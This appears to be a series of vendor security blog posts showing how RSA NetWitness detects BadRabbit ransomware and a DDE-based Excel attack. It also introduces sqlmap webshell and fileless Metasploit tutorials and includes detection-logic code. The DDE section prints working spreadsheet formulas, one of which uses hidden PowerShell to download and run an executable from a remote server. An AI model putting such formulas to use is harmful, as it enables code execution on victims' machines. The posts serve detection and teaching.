BadRabbit

BadRabbit is a new ransomware that has been spreading across Eastern Europe.

Once a machine is infected, the malware tries to spread laterally via SMB, dumping passwords with mimikatz to obtain credentials for that spread.

It will then encrypt documents on the local machine, modify the MBR and reboot the machine, making it impossible to boot without paying the ransom.

The following are examples of the visibility an enterprise with RSA NetWitness Endpoint and Packets would have when a machine gets infected.

First, from the perspective of RSA NetWitness Packets, it is possible to see the SMB traffic generated by the infected machine as it tries to log in using a set of hard-coded usernames and passwords (full list available here: BadRabbit credential dictionary – Pastebin.com).

[Screenshot: netwitness-smb]

From the perspective of RSA NetWitness Endpoint, we can see the following:

We can identify the modules that are part of the attack.

[Screenshot: modules]

– B4DD.tmp is a version of mimikatz, used to dump passwords from lsass.exe

– cscc.dat is a legitimate tool used for the encryption

– shutdown.exe is used by the malware to restart the machine

By analyzing those modules we can get a bit more detail.

For example, by analyzing dispci.exe we can see the file extensions it looks for when encrypting:

[Screenshot: extensions]

As well as some of the encryption/decryption messages that would eventually pop up for the user:

[Screenshot: messages-discpci]

If we then look at the triggered IIOCs and behaviors:

[Screenshot: iiocs]

1- The malware is reading a large number of documents in a short period of time (typical ransomware behavior)

2- Reported as malicious by the reputation service (Reversing Labs)

If we want more detail on what has happened, we can look at the tracking data:

[Screenshot: tracking1]

1- the different modules needed by the malware are dropped to disk

2- it removes any previous tasks installed by the malware (notice the task names, which reference the dragons in Game of Thrones)

3- new scheduled tasks are added to run the encryption with the victim’s ID and then shut down the machine

4- we then see B4DD.tmp (mimikatz) accessing lsass.exe to try and dump credentials

5- it then accesses all documents whose extensions match, in order to encrypt them

[Screenshot: tracking2]

6- it then deletes logs and events

7- and finally removes/adds scheduled tasks to restart the machine
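
As an added illustration (not part of the original post and not NetWitness code), the two behaviours called out in the tracking data, a process opening lsass.exe and a process reading many documents in a short window, expressed as detection logic over a constructed set of endpoint events; the document-extension set, the lsass allowlist and the thresholds are assumptions to be tuned per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed endpoint tracking events (not real NetWitness output), shaped like
# the tracking data above: (timestamp, process, action, target).
EVENTS = [
    ("2017-10-24T10:00:01", "B4DD.tmp", "open_process", "lsass.exe"),
    ("2017-10-24T10:00:02", "MsMpEng.exe", "open_process", "lsass.exe"),
    ("2017-10-24T10:00:05", "dispci.exe", "read_file", r"C:\Users\bob\report.docx"),
    ("2017-10-24T10:00:06", "dispci.exe", "read_file", r"C:\Users\bob\budget.xlsx"),
    ("2017-10-24T10:00:07", "dispci.exe", "read_file", r"C:\Users\bob\slides.pptx"),
    ("2017-10-24T10:00:08", "dispci.exe", "read_file", r"C:\Users\bob\notes.txt"),
    ("2017-10-24T10:00:09", "dispci.exe", "read_file", r"C:\Users\bob\scan.pdf"),
    ("2017-10-24T10:00:09", "dispci.exe", "read_file", r"C:\Users\bob\app.exe"),
    ("2017-10-24T10:00:30", "winword.exe", "read_file", r"C:\Users\bob\memo.docx"),
    ("2017-10-24T10:05:00", "winword.exe", "read_file", r"C:\Users\bob\plan.docx"),
]
# Assumed document extensions to watch; the malware's own list is in the screenshot above.
DOC_EXT = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt"}
# Assumed allowlist of processes expected to open lsass.exe; tune per environment.
LSASS_ALLOW = {"MsMpEng.exe", "csrss.exe", "wininit.exe"}

def mass_document_reads(events, threshold=5, window=timedelta(seconds=30)):
    """Processes that read at least `threshold` document files inside any `window`."""
    per_proc = defaultdict(list)
    for ts, proc, action, target in events:
        if action == "read_file" and target.rsplit(".", 1)[-1].lower() in DOC_EXT:
            per_proc[proc].append(datetime.fromisoformat(ts))
    flagged = set()
    for proc, times in per_proc.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over the sorted read times
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(proc)
                break
    return flagged

def unexpected_lsass_access(events, allow=LSASS_ALLOW):
    """Processes outside the allowlist that opened a handle to lsass.exe."""
    return {proc for _, proc, action, target in events
            if action == "open_process" and target.lower() == "lsass.exe"
            and proc not in allow}

if __name__ == "__main__":
    print("mass document reads:", mass_document_reads(EVENTS))        # {'dispci.exe'}
    print("unexpected lsass access:", unexpected_lsass_access(EVENTS))  # {'B4DD.tmp'}
```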

Once the machine gets restarted, the victim is not able to boot to Windows and gets the following message:

[Screenshot of the message shown at boot]

This shows how RSA NetWitness Packets and Endpoint can help get early notification and detection for new breeds of malware without relying on known signatures, and how they can be used to easily look for IOCs and indicators to quickly respond and identify compromised machines.

MS Excel Command Execution Without Macros

There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other Office documents) without the need for macros.

The method uses Dynamic Data Exchange (DDE), and what makes it interesting is that, even though it does cause prompts to appear, it doesn’t use macros and is therefore less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a “feature” and not a vulnerability, it is not something that will be patched, and it cannot be easily prevented or blocked.

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:

=cmd|' /c notepad'!A0

Once the user opens the file and accepts the prompts, notepad.exe will be launched.

To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload “YGH.exe” is hosted on the “192.168.1.3” server):

=cmd|'/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\"http://192.168.1.3/YGH.exe\",\"c:\\Users\\Public\\YGH.exe\");Start-Process \"c:\\Users\\Public\\YGH.exe\"'!A0

Once the victim opens the file, this is what he sees:

After accepting the first warning message, he sees a second warning:

And finally the payload gets downloaded and executed:

In a real life scenario, the malware would have done something more stealthy, or provided remote access to the attacker instead of displaying a message.

Detection Using RSA NetWitness Endpoint (EDR)

Now, from the RSA NetWitness Endpoint view, this would be detected very easily.

  1. IIOCs are triggered for Office running PowerShell and for PowerShell downloading content. These could be used to generate real-time alerts via email and/or Syslog and get notified at an early stage of the attack.
  2. Excel is executed
  3. Excel launches “cmd.exe”. From the command arguments we can see that cmd is used to launch PowerShell to download and execute a file called “YGH.exe” from the “192.168.1.3” server.
  4. PowerShell saves the YGH.exe file to disk
  5. PowerShell executes the YGH.exe file
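
Added example, not from the original post or from RSA: the process-chain logic behind points 2 to 5, walking constructed process-creation records to find a shell whose ancestry includes an Office application, and the binary such a shell then launches; the PIDs, image names, command lines and the download-indicator pattern are assumptions.

```python
import re

# Constructed process-creation records (not NetWitness data): (pid, ppid, image,
# command line). They mirror the chain in the list above: Excel -> cmd.exe ->
# powershell.exe downloading YGH.exe -> YGH.exe running. PIDs are invented.
PROCS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "excel.exe", r'"C:\Program Files\Microsoft Office\EXCEL.EXE" invoice.xlsx'),
    (300, 200, "cmd.exe", r'cmd /c powershell.exe -w hidden (New-Object System.Net.WebClient)'
                          r'.DownloadFile("http://192.168.1.3/YGH.exe","C:\Users\Public\YGH.exe")'),
    (400, 300, "powershell.exe", r'powershell.exe -w hidden (New-Object System.Net.WebClient)'
                                 r'.DownloadFile("http://192.168.1.3/YGH.exe","C:\Users\Public\YGH.exe")'),
    (500, 400, "YGH.exe", r"C:\Users\Public\YGH.exe"),
    (600, 100, "powershell.exe", "powershell.exe Get-ChildItem"),  # benign: not under Office
    (800, 200, "cmd.exe", "cmd /c dir"),  # Office child without a download indicator
]
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed indicators that a command line fetches content from the network.
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|https?://", re.I)

def office_shell_chains(procs):
    """For each shell with an Office application in its ancestry, return
    (shell pid, office image, chain of images from Office down, downloads?)."""
    by_pid = {pid: (ppid, image) for pid, ppid, image, _ in procs}
    findings = []
    for pid, ppid, image, cmdline in procs:
        if image.lower() not in SHELLS:
            continue
        chain, cur = [image], ppid
        while cur in by_pid:  # walk up until an Office parent or the tree root
            cur, pimage = by_pid[cur]
            chain.append(pimage)
            if pimage.lower() in OFFICE:
                findings.append((pid, pimage, chain[::-1], bool(DOWNLOAD_RE.search(cmdline))))
                break
    return findings

def executed_payloads(procs):
    """Non-shell images started by a shell that itself runs under Office (point 5)."""
    shell_pids = {f[0] for f in office_shell_chains(procs)}
    return [image for _, ppid, image, _ in procs
            if ppid in shell_pids and image.lower() not in SHELLS]

if __name__ == "__main__":
    for pid, office, chain, downloads in office_shell_chains(PROCS):
        print(pid, " -> ".join(chain), "download indicator" if downloads else "")
    print("payloads executed:", executed_payloads(PROCS))  # ['YGH.exe']
```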

This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user’s workstation.

This has been detected even though Excel is approved software with a valid, trusted signature and the malware itself didn’t perform any malicious activity (it only shows a message to the victim). It demonstrates early detection based on behavior, before the negative impact actually happens.

From SQL Injection to WebShell

An SQL Injection attack is not limited to dumping a database; it can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells receive commands from attackers mainly using two methods:

  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs

In this tutorial we will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.

Fileless Infection Using Metasploit and PowerShell

Fileless malware is a method used to compromise a system without writing any file to disk. This allows the malware to remain stealthy and avoid detection by some antivirus, EPP and EDR solutions.

We will look at how to test this type of attack and then at ways to detect it.